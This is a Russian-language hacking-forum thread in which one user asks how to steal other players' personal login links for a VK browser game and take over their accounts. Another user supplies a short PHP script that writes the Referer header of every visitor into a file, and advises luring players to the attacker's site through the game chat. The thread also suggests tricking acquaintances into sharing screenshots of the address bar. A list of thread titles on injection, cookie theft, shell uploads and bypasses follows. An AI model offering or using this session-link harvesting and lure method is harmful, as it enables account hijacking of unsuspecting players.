[QUESTION] How to get the link by which the user entered the site

allen_anon · Feb 27, 2017

В общем суть такова, есть браузерная игра, при входе стандартным способом, каждому игроку выдается индивидуальный ключ, который автоматически дописывается в адресной строке, и так устроена авторизация в игре.

Если в двух словах, то вы заходите в игру (введя логин и пароль) и вас перебрасывает на игровой сервер по ссылке, эта ссылка лично у вас всегда остается одной, и если её скопировать и вставить в другом браузере (при этом не вводить ни логин ни пароль), то вы так же подключитесь к серверу под тем же юзером, и сможете играть.

Каким способом я могу получить чужую ссылку на эту игру, и войти под именем того человека?

P.S.: Простите за не совсем ясное изложение инфы, я не до конца понимаю как это объяснить, надеюсь кто-то поймет.

renameduser_73608 · Feb 27, 2017

Чат есть на сервере?

allen_anon · Feb 27, 2017

renameduser_73608 Чат есть на сервере?
Click to expand...

Он есть прямо в игре, а игра воспроизводится через flash player

renameduser_73608 · Feb 27, 2017

Ну смотри, можно попробовать так:
Регаешь хостинг (желательно привязываешь к нему домен), затем заливаешь на него скрипт (именуй index.php) примерно с следующим содержанием:
<?php
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);
?>

Code
<?php

$referer = $_SERVER['HTTP_REFERER'];

file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);

?>
дальше кидаешь имя своего сайта в чат и заманчиво просишь перейти, и по идеи ты получишь ссылки всех тех кто перешел в файле links.txt

allen_anon · Feb 27, 2017

renameduser_73608 Ну смотри, можно попробовать так:
Регаешь хостинг (желательно привязываешь к нему домен), затем заливаешь на него скрипт (именуй index.php) примерно с следующим содержанием:
<?php
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);
?>

Code
<?php

$referer = $_SERVER['HTTP_REFERER'];

file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);

?>
дальше кидаешь имя своего сайта в чат и заманчиво просишь перейти, и по идеи ты получишь ссылки всех тех кто перешел в файле links.txt
Click to expand...
Спасибо, от души прям, буду пробовать

allen_anon · Feb 27, 2017

renameduser_73608 Ну смотри, можно попробовать так:
Регаешь хостинг (желательно привязываешь к нему домен), затем заливаешь на него скрипт (именуй index.php) примерно с следующим содержанием:
<?php
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);
?>

Code
<?php

$referer = $_SERVER['HTTP_REFERER'];

file_put_contents("links.txt", $referer, FILE_APPEND | LOCK_EX);

?>
дальше кидаешь имя своего сайта в чат и заманчиво просишь перейти, и по идеи ты получишь ссылки всех тех кто перешел в файле links.txt
Click to expand...
А если такая ситуация, в чате нельзя переходить по ссылкам, в таком случае возможно что-то сделать?

renameduser_73608 · Feb 27, 2017

allen_anon А если такая ситуация, в чате нельзя переходить по ссылкам, в таком случае возможно что-то сделать?
Click to expand...

Я не знаю, что за игра, но возможно в профиле есть место для ссылки на сайт или соц сеть, если нет, то только с помощью сторонних програм
А если человека знаешь лично, то попроси сделать скрин экрана когда он в игре, а там уже ручками с картинки перепиши ссылку которая в адресной строке

allen_anon · Feb 27, 2017

renameduser_73608 Я не знаю, что за игра, но возможно в профиле есть место для ссылки на сайт или соц сеть, если нет, то только с помощью сторонних програм
А если человека знаешь лично, то попроси сделать скрин экрана когда он в игре, а там уже ручками с картинки перепиши ссылку которая в адресной строке
Click to expand...

Сейчас я опишу ситуацию подробнее.
Эта игра находится в вк, люди в неё заходят как обычно во все приложения, со своих страниц, и у них прямо в вк оно открывается, показывает вверху ссылку на приложение. Но я кое-как смог узнать на каком сервере хранится эта игра, от куда она загружается в это окно с приложением в вк. И я могу зайти в приложение со своей страницы, открыть его в новом окне браузера, и меня направит прямо по ссылке на этот сервер, и игра откроется уже не в вк, а именно на том сайте где она хранится, и моя ссылка будет индивидуальной, впрочем как и у каждого.

Проблема в том что я не могу это объяснить толком, показывать нужно :D
Но если с этим разобраться, то эту игру, довольно таки популярную, можно будет взломать, получив аккаунты многих пользователей (в самой игре).

allen_anon · Feb 27, 2017

renameduser_73608 Я не знаю, что за игра, но возможно в профиле есть место для ссылки на сайт или соц сеть, если нет, то только с помощью сторонних програм
А если человека знаешь лично, то попроси сделать скрин экрана когда он в игре, а там уже ручками с картинки перепиши ссылку которая в адресной строке
Click to expand...

Вот есть программа для взлома нескольких игр, которые используют ту же систему авторизации, думаю по ней будет ясна моя цель
http://hack-games-vk.ru/topic/5996-...y-assault-survival/?hl=+короли++улиц++аккаунт

renameduser_73608 · Feb 27, 2017

allen_anon Вот есть программа для взлома нескольких игр, которые используют ту же систему авторизации, думаю по ней будет ясна моя цель
Click to expand...

Я бы тоже мог посмотреть и попробовать найти как генерируется ссылка, но время будет только на след выходных

allen_anon · Mar 2, 2017

renameduser_73608 Я бы тоже мог посмотреть и попробовать найти как генерируется ссылка, но время будет только на след выходных
Click to expand...

Буду очень благодарен помощи в любое время, один я вряд ли справлюсь

All about SQL Injections and No SQL Injections and their exploitation

Free eat in Rostics

We go to cookies to Roblox account on iPhone/Android

About CSRF Attack and the importance of CSRF TOKEN on your site

We occupy all places in the cinema without investments

How to get around the antifrod Google cards?

Help with pentest

The history of 2f bypass on a network of banks with a capitalization of 50V+

We find unpacked dads for our goals

Khostim Ratnik for free without opening ports and hosting

Do you have an old tunnel in Playit.gg and can not delete it? We will decide

How to *****For Cover with Dahua DVR standard

We go around the game launches (GTA, Far Cry, RDR, etc.)

How to view any video from any user in the office

We loot additional proxies

Bypassing the Social Club launcher in games (GTA IV, GTA V, RDR II, etc.)

Acquaintance with the web scanner of the vulnerabilities of Nikto and the exploitation of XSS

An example of the operation of WebSocket vulnerability (Burp Suite)

All about File Inclusion and Remote File Inclusion

Hacking games in Telegram.

Uploading a shell on vBulletin 5

We register the Yandex Account for Tempom

XSS Administrator Escalation (WP) | Elevating rights to admin | We get access without restrictions

Login to your account using Cookie using Roblox as an example

Windows Theme Spoofing CVE-2024-21320

WAF bypass. How to find out the IP of a site that uses WAF or DDoS protection

We get an account on xaker.ru without registration (without subscription)

Vulnerability in remote access software

The story of how I completely hacked wordpress sites..

RCE via plugin loading (CVE-2024-31210)

[QUESTION] How to get the link by which the user entered the site